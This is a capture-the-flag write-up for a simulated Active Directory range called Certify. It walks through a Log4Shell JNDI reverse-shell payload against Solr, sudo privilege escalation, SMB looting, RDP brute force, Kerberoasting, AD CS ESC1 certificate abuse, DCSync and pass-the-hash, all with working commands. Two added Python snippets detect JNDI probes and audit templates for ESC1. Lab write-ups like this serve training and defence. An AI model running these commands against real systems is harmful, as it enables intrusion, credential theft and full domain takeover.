Title: Spring and Autumn Cloud Mirror-[Simulation Scene] Certify Writeup

Instructions

Certify is a medium-difficulty cyber range environment. Completing this challenge helps players understand proxy forwarding, intranet scanning, information gathering, privilege escalation and lateral movement in intranet penetration, strengthens their understanding of the core authentication mechanisms of a domain environment, and covers some interesting technical points of domain penetration. There are 4 flags in the range, spread across different target machines.

Technologies

Solr, AD CS, SMB, Kerberos, Domain Penetration

First flag

log4j RCE

Scan the external network IP

Solr is found to ship a log4j component, so test whether it is vulnerable to RCE. Probe request with a dnslog callback:

GET /solr/admin/cores?action=${jndi:ldap://1p9bvr.dnslog.cn} HTTP/1.1
Host: 47.92.113.194:8983
Accept: application/json, text/plain, */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36
X-Requested-With: XMLHttpRequest
Referer: http://47.92.113.194:8983/solr/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,zh-TW;q=0.8
Connection: close

The dnslog callback arrives, confirming that the JNDI lookup is evaluated.

JNDI reverse shell. On the VPS:

# Load the malicious class server
java -jar JNDIExploit-1.3-SNAPSHOT.jar -i 47.103.xxx.xxx

# Start the listener
nc -lvvp 5555

Payload:

${jndi:ldap://47.103.xxx.xxx:1389/Basic/ReverseShell/47.103.xxx.xxx/5555}

Send the request:

GET /solr/admin/cores?action=${jndi:ldap://47.103.xxx.xxx:1389/Basic/ReverseShell/47.103.xxx.xxx/5555}wt=json HTTP/1.1
Host: 47.92.113.194:8983
Accept: application/json, text/plain, */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36
X-Requested-With: XMLHttpRequest
Referer: http://47.92.113.194:8983/solr/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,zh-TW;q=0.8
Connection: close

The reverse shell connects back successfully.

sudo privilege escalation

sudo -l

sudo grc --help

sudo grc --pty whoami

Find the flag:

sudo grc --pty find / -name flag*

Output the flag:

sudo grc --pty cat /root/flag/flag01.txt
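For the defending side, the probe and payload requests above leave a recognisable trace in the Solr access log. The following is an added example, not part of the original writeup: it scans constructed access-log lines (client IPs are made up, the request paths mirror the ones above, one of them percent-encoded) for ${jndi:...} lookups and reports the callback host each one points at.

```python
# Added example (not part of the original writeup): scan Solr access-log
# lines for Log4Shell-style ${jndi:...} lookups like the cores?action=
# request shown above, and report the callback host each one points at.
import re
from urllib.parse import unquote, urlsplit

# Constructed sample log (combined-log style); client IPs are made up, the
# request paths mirror the writeup, one of them percent-encoded.
SAMPLE_LOG = """\
10.0.0.5 - - [07/Mar/2023:11:05:17 +0800] "GET /solr/admin/cores?action=STATUS&wt=json HTTP/1.1" 200 512
10.0.0.9 - - [07/Mar/2023:11:05:18 +0800] "GET /solr/admin/cores?action=${jndi:ldap://1p9bvr.dnslog.cn} HTTP/1.1" 200 1023
10.0.0.9 - - [07/Mar/2023:11:05:20 +0800] "GET /solr/admin/cores?action=%24%7Bjndi%3Aldap%3A%2F%2F47.103.xxx.xxx%3A1389%2FBasic%2FReverseShell%2F47.103.xxx.xxx%2F5555%7D&wt=json HTTP/1.1" 200 1023
10.0.0.7 - - [07/Mar/2023:11:05:21 +0800] "GET /solr/ HTTP/1.1" 200 16555
"""

LINE_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})')
# A JNDI lookup, capturing the callback scheme and host[:port].
JNDI_RE = re.compile(r'\$\{jndi:(?P<scheme>[a-z]+)://(?P<target>[^/}\s]+)', re.IGNORECASE)


def find_jndi_probes(log_text):
    """Return one finding per request whose decoded path contains a ${jndi:...} lookup."""
    findings = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        path = m.group("path")
        # Peel off a few layers of percent-encoding so double-encoded
        # payloads are matched as well.
        for _ in range(3):
            decoded = unquote(path)
            if decoded == path:
                break
            path = decoded
        hit = JNDI_RE.search(path)
        if hit is None:
            continue
        findings.append({
            "src": m.group("src"),
            "time": m.group("ts"),
            "endpoint": urlsplit(path).path,
            "scheme": hit.group("scheme").lower(),
            "callback": hit.group("target"),
        })
    return findings
```

Run over a real Solr request log, the callback field is what you would hand to the network team for egress blocking and to threat intel for attribution.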

The second flag

Intranet penetration

Set up a proxy on the edge machine and scan the intranet. I won't go into the details (start an HTTP service, wget npc and fscan onto the box). fscan output:

172.22.9.13:445 open

172.22.9.26:445 open

172.22.9.47:445 open

172.22.9.7:445 open

172.22.9.26:139 open

172.22.9.47:139 open

172.22.9.7:139 open

172.22.9.26:135 open

172.22.9.13:139 open

172.22.9.13:135 open

172.22.9.7:135 open

172.22.9.26:80 open

172.22.9.47:80 open

172.22.9.19:80 open

172.22.9.47:22 open

172.22.9.47:21 open

172.22.9.19:22 open

172.22.9.7:88 open

172.22.9.19:8983 open

[+] NetInfo:

[*]172.22.9.13

[-]CA01

[-]172.22.9.13

[*] 172.22.9.7 [+]DC XIAORANG\XIAORANG-DC

[*] 172.22.9.26 XIAORANG\DESKTOP-CBKTVMO

[+] NetInfo:

[*]172.22.9.26

[-]DESKTOP-CBKTVMO

[-]172.22.9.26

[+] NetInfo:

[*]172.22.9.7

[-]XIAORANG-DC

[-]172.22.9.7

[*] 172.22.9.13 XIAORANG\CA01

[*] WebTitle:http://172.22.9.47 code:200 len:10918 title:Apache2 Ubuntu Default Page: It works

[*] WebTitle:http://172.22.9.19 code:200 len:612 title:Welcome to nginx!

[*] 172.22.9.47 WORKGROUP\FILESERVER Windows 6.1

[*] 172.22.9.47 (Windows 6.1)

[*] WebTitle:http://172.22.9.19:8983 code:302 len:0 title:None Jump url: http://172.22.9.19:8983/solr/

[*] WebTitle:http://172.22.9.26 code:200 len:703 title:IIS Windows Server

[*] WebTitle:http://172.22.9.19:8983/solr/ code:200 len:16555 title:Solr Admin

The following assets were discovered:

172.22.9.19 entrance IP

172.22.9.7 DC

172.22.9.26 domain member

172.22.9.47 file server

172.22.9.13 CA

According to the prompt, the file server should have an SMB share; collect more information from it.

Note: fscan does not enumerate SMB shares, so use nmap for that.

sudo grc --pty nmap -sT -A 172.22.9.47

Use smbclient to connect to the share:

proxychains smbclient \\\\172.22.9.47\\fileshare

dir

get personnel.db

get secret\flag02.txt

This yields flag02, and there is another prompt: you have enumerated SMB, but do you know what an SPN is?


The third flag

There are several user names and passwords in the database file

RDP cracking

proxychains hydra -L user.txt -P pwd.txt 172.22.9.26 rdp -vV -e ns

Two accounts are obtained, but they cannot log in remotely.

Kerberoast attack

Use GetUserSPNs.py to find SPNs registered under domain users:

proxychains python3 GetUserSPNs.py -request -dc-ip 172.22.9.7 xiaorang.lab/zhangjian

Crack the hash offline; it is very fast. 1.txt holds the hash value and rockyou.txt is the wordlist that ships with Kali:

hashcat64.exe -m 13100 1.txt rockyou.txt

This gives zhangxia/MyPass2@@6; use that account and password to log in remotely.

Note that because this is a domain account, the user name must be given in user@domain form. After logging in, you cannot simply open the Administrator directory to find the flag, because the account does not have administrator privileges.


ADCS ESC1

Use Certify.exe to locate vulnerable templates:

Certify.exe find /vulnerable

ESC1 prerequisites:

msPKI-Certificates-Name-Flag: ENROLLEE_SUPPLIES_SUBJECT

Indicates that a user requesting a certificate from this template supplies the subject themselves, i.e. can request a certificate for any other user, including the domain administrator.

PkiExtendedKeyUsage: Client Authentication

Indicates that certificates issued from this template can be used for client authentication against Active Directory.

Enrollment Rights: NT Authority\Authenticated Users

Indicates that any authenticated user in Active Directory is allowed to request new certificates from this template.
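The three conditions above are exactly what a defender should audit templates for. The following is an added example, not part of the writeup and not Certify's own logic: it evaluates constructed template records keyed by the LDAP attribute names, treats the enrollment ACL as an assumed simplified "enrollment_rights" list, and also checks the two controls that break ESC1 (manager approval and required authorized signatures). The 'XR Manager' record uses the template name from the writeup; its attribute values beyond the three quoted above are assumed.

```python
# Added example (not from the writeup, and not Certify's own logic): audit
# certificate templates for the ESC1 combination listed above. Input is a
# constructed dict per template using the LDAP attribute names; the
# "enrollment_rights" list is an assumed simplification of the template ACL.
ENROLLEE_SUPPLIES_SUBJECT = 0x00000001   # msPKI-Certificate-Name-Flag bit
PEND_ALL_REQUESTS = 0x00000002           # msPKI-Enrollment-Flag: manager approval
AUTH_EKUS = {
    "1.3.6.1.5.5.7.3.2",       # Client Authentication
    "1.3.6.1.5.2.3.4",         # PKINIT Client Authentication
    "1.3.6.1.4.1.311.20.2.2",  # Smart Card Logon
    "2.5.29.37.0",             # Any Purpose
}
BROAD_PRINCIPALS = {"Authenticated Users", "Domain Users", "Domain Computers", "Everyone"}


def is_esc1(t):
    """True when a low-privileged principal can enroll, supply the subject,
    obtain an authentication-capable certificate, and no approval is required."""
    supplies_subject = bool(int(t.get("msPKI-Certificate-Name-Flag", 0)) & ENROLLEE_SUPPLIES_SUBJECT)
    ekus = set(t.get("pKIExtendedKeyUsage", []))
    auth_capable = not ekus or bool(ekus & AUTH_EKUS)   # an empty EKU list means any purpose
    broad_enroll = any(p.split("\\")[-1] in BROAD_PRINCIPALS for p in t.get("enrollment_rights", []))
    needs_approval = bool(int(t.get("msPKI-Enrollment-Flag", 0)) & PEND_ALL_REQUESTS)
    needs_signatures = int(t.get("msPKI-RA-Signature", 0)) > 0
    return supplies_subject and auth_capable and broad_enroll and not (needs_approval or needs_signatures)


def audit(templates):
    """Return the names of ESC1-exposed templates, sorted."""
    return sorted(name for name, t in templates.items() if is_esc1(t))


# Constructed sample: 'XR Manager' is the template named in the writeup with
# the three attributes quoted above; the other three are counter-examples.
SAMPLE_TEMPLATES = {
    "XR Manager": {"msPKI-Certificate-Name-Flag": 1, "pKIExtendedKeyUsage": ["1.3.6.1.5.5.7.3.2"],
                   "enrollment_rights": ["NT AUTHORITY\\Authenticated Users"]},
    # Default-style User template: the SAN is built from AD, not supplied by the requester.
    "User": {"msPKI-Certificate-Name-Flag": 0x82000000, "pKIExtendedKeyUsage": ["1.3.6.1.5.5.7.3.2"],
             "enrollment_rights": ["XIAORANG\\Domain Users"]},
    # Requester supplies the subject, but only Server Authentication is allowed.
    "WebServer": {"msPKI-Certificate-Name-Flag": 1, "pKIExtendedKeyUsage": ["1.3.6.1.5.5.7.3.1"],
                  "enrollment_rights": ["NT AUTHORITY\\Authenticated Users"]},
    # Same as XR Manager, but CA manager approval is required.
    "Approved": {"msPKI-Certificate-Name-Flag": 1, "pKIExtendedKeyUsage": ["1.3.6.1.5.5.7.3.2"],
                 "enrollment_rights": ["NT AUTHORITY\\Authenticated Users"], "msPKI-Enrollment-Flag": 2},
}
```

Any template the audit returns should either lose ENROLLEE_SUPPLIES_SUBJECT, have its enrollment rights narrowed, or require manager approval.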

Request a certificate for the domain administrator:

Certify.exe request /ca:CA01.xiaorang.lab\xiaorang-CA01-CA /template:'XR Manager' /altname:XIAORANG.LAB\Administrator

Convert the format:

openssl pkcs12 -in cert.pem -keyex -CSP 'Microsoft Enhanced Cryptographic Provider v1.0' -export -out cert.pfx

Request a TGT and pass the ticket. Because no password was entered when exporting the certificate during conversion, leave the password blank here:

Rubeus.exe asktgt /user:Administrator /certificate:cert.pfx /password: /ptt

After obtaining the domain administrator's ticket, dump the hash:

mimikatz.exe 'lsadump::dcsync /domain:xiaorang.lab /user:Administrator' exit

Pass the hash

PTH to 172.22.9.26:

proxychains crackmapexec smb 172.22.9.26 -u administrator -H 2f1b57eefb2d152196836b0516abea80 -d xiaorang.lab -x 'type Users\Administrator\flag\flag03.txt'

The fourth flag

PTH DC

proxychains python3 wmiexec.py -hashes 00000000000000000000000000000000:2f1b57eefb2d152196836b0516abea80 [email protected]

Original link: https://zhuanlan.zhihu.com/p/581487685
